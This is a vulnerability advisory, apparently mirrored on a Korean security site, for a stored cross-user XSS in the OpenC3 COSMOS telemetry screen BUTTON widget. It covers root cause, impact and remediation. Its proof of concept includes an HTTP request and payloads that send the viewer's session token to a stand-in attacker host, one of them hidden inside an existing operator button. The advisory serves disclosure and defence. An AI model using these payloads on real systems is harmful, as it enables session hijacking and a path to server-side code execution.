OpenC3 COSMOS: Stored, cross-user XSS via Telemetry screen BUTTON widget
위협 신호 · CVSS · EPSS · KEV
이론적 심각도 점수
예측 데이터 없음
실측 악용 기록 없음
계획된 패치 주기 내 조치(60일 이내)
CVSS 벡터 · 메트릭
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N상세 설명
Summary
A user who can save a telemetry screen (permission system_set) can embed JavaScript in a screen BUTTON widget. The BUTTON widget eval()s the stored button text in the browser when the button is activated, and screens are shared content rendered to other users in the scope. As a result, an attacker's stored JavaScript executes in a different operator's authenticated session — a stored, cross-user XSS (not self-XSS). The payload runs in the COSMOS origin and can read localStorage.openc3Token (the victim's session token), enabling session/account takeover and, via the victim's privileges, a path to server-side code execution through the Script Runner.
The site's Content-Security-Policy permits 'unsafe-inline'/'unsafe-eval' (see "Contributing factor"), so the injected script runs unimpeded.
- Product: OpenC3 COSMOS (Core; likely Enterprise — see scoping note)
- Affected version: confirmed 7.2.0 (latest, tested 2026-06-25); the code path is present on
main. Lower bound for maintainer to confirm. - Reporter: Arpit Kubadia
Description & root cause
- Screen save (the store):
POST /openc3-api/screen→ScreensController#create(openc3-cosmos-cmd-tlm-api/app/controllers/screens_controller.rb:35-43) persists the raw screen text afterauthorization('system_set'). No sanitization of the screen body. - The sink (the execution): the
BUTTONwidget stores the button's action as its second parameter andeval()s it on click —openc3-cosmos-init/plugins/packages/openc3-vue-common/src/widgets/ButtonWidget.vue:109:text1const lines = this.eval.split(';;') // this.eval == parameters[1] from the stored screen2...3const result = eval(lines[i].trim()) // attacker-controlled string -> arbitrary JS in the victim's session - Cross-user delivery: screens are stored per-scope and rendered to any user who opens them (e.g. in Telemetry Viewer). So a screen saved by user A executes in user B's browser.
- Contributing factor (CSP):
openc3-traefik/traefik.yaml:63setsscript-src 'unsafe-inline' 'unsafe-eval' https: blob: ...on every SPA response, so the injected/eval'd script is not blocked. (Reportable as a hardening item in its own right.)
Proof of Concept
A. Minimal PoC — a button that steals the viewer's token (verified)
Authenticated as any user (Core) / a system_set user (Enterprise), store a screen:
1POST /openc3-api/screen HTTP/1.1 2Host: localhost:2900 3Content-Type: application/json 4Authorization: ses_<YOUR_TOKEN> 5Content-Length: 224 6 7{"scope":"DEFAULT","target":"INST","screen":"XSSPOC","text":"SCREEN AUTO AUTO 1.0\nLABEL \"Instrument Status\"\nBUTTON 'Refresh' 'fetch(\"https://ATTACKER-COLLABORATOR/?t=\"+encodeURIComponent(localStorage.openc3Token))'\n"}→ HTTP 200, body true. Trigger (as the victim): open http://<host>:2900/tools/tlmviewer → Target INST, Screen XSSPOC → click Refresh. The victim's session token is exfiltrated to ATTACKER-COLLABORATOR. (Verified: an out-of-band request carrying a live ses_… token was received at the attacker host.)
A purely visual variant: replace the action with alert(localStorage.openc3Token).
B. Realistic exploitation — hijack an EXISTING operational screen (no lure)
The minimal PoC needs the victim to open the attacker's screen. The realistic attack overwrites a screen operators already use, hiding the payload behind a button they already click:
- The
BUTTONaction iseval'd afterthis.eval.split(';;'), so appending;; <payload>to an existing button keeps the original command working and adds the attacker's code. The operator sees no change. - Example: take the stock
INST COMMANDINGscreen'sStart Collectbutton (which sendsapi.cmd('INST COLLECT ...')) and append:Re-save the screen (text1... +2" ;; fetch('https://ATTACKER-COLLABORATOR/?t='+encodeURIComponent(localStorage.openc3Token))"POST /openc3-api/screen, same route). Now every operator who opens COMMANDING and clicksStart Collectduring normal operations sends the real command and leaks their session token. No new button, no behavioral change, no social-engineering lure.
Impact
The injected script runs with the victim's session in the COSMOS origin. It can:
- Exfiltrate the victim's session token (
localStorage.openc3Token) → session/account takeover (the token is a bearer credential accepted in theAuthorizationheader). - Act as the victim against the API, and — for a victim with script privileges — pivot to the Script Runner to achieve server-side code execution (the documented escalation chain).
This is cross-user / persistent: an attacker who can edit shared screens compromises the sessions of other operators viewing those screens, which is materially worse than self-XSS.
Remediation
- Do not
eval()screen-supplied strings. Replace theBUTTONwidget'sevalwith a constrained, non-evalcommand interface (an allow-listed API surface / safe expression evaluator), or sandbox it. - Tighten the CSP (
openc3-traefik/traefik.yaml): remove'unsafe-inline'/'unsafe-eval', move to per-requestnonce+'strict-dynamic', addobject-src 'none',base-uri 'self',frame-ancestors 'self'. This alone neutralizes injected inline/eval'd script. - Treat screens as untrusted, cross-user content — escape/validate on render; consider gating screen-embedded JavaScript behind a dedicated, clearly-privileged capability rather than the general
system_set.
AI 심층 분석
공격 시나리오 · 재현 가능한 PoC 페이로드 · 즉시 적용 가능한 차단 패치를 한 번에 받아 보세요. 보안 운영팀이 그대로 점검·티켓팅에 쓸 수 있는 형태로 정리해 드립니다.
참고 자료 5
링크 내용 불러오는 중…